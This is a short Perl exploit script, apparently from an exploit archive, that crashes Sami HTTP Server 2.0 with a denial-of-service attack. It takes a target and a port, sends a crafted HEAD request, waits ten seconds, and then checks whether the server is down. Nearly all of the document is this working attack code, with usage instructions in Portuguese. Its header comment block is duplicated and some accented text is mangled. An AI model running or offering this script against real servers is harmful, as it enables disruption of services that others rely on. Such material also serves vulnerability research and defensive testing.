#
#
# Date: 06/14/2021 14 Jun
#
# Version Vulnerable: Sami HTTP 2.0
#
# OS Tested: Windows XP PACK 3 Brazilian
#
use IO::Socket;#
#
# Date: 06/14/2021 14 Jun
#
# Version Vulnerable: Sami HTTP 2.0
#
# OS Tested: Windows XP PACK 3 Brazilian
#
use IO::Socket;
$sis="$^O";
print $sis;
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
if ((!$ARGV[0]) || (!$ARGV[1])) {
&apresentacao();
exit;
}
sub apresentacao {
print q {
##############################################################
# #
# [*] Sami HTTP Server 2.0 Denied Of Service
#
# #
# #
# [*] Author: Fernando Mengali #
# #
# #
# [+] Modo de uso: perl exploit.pl <Target> <Porta> #
# #
# #
################# Code Exploit ###############################
}
}
$target = $ARGV[0];
$porta = $ARGV[1];
print "Sobrecarregando servidor... ";
$socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $porta,
Proto => "tcp", Timeout => 1) || die "Não foi possÃvel conectar ao
servidor: $target! ";
print $socket "HEAD /x41x42x43x44x45x46x47x25x49 HTTP/1.0 ";
close($socket);
sleep(10);
$socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $porta,
Proto => "tcp", Timeout => 1) || die "Servidor down: $target! ";
print $socket "HEAD / HTTP/1.0 ";
close($socket);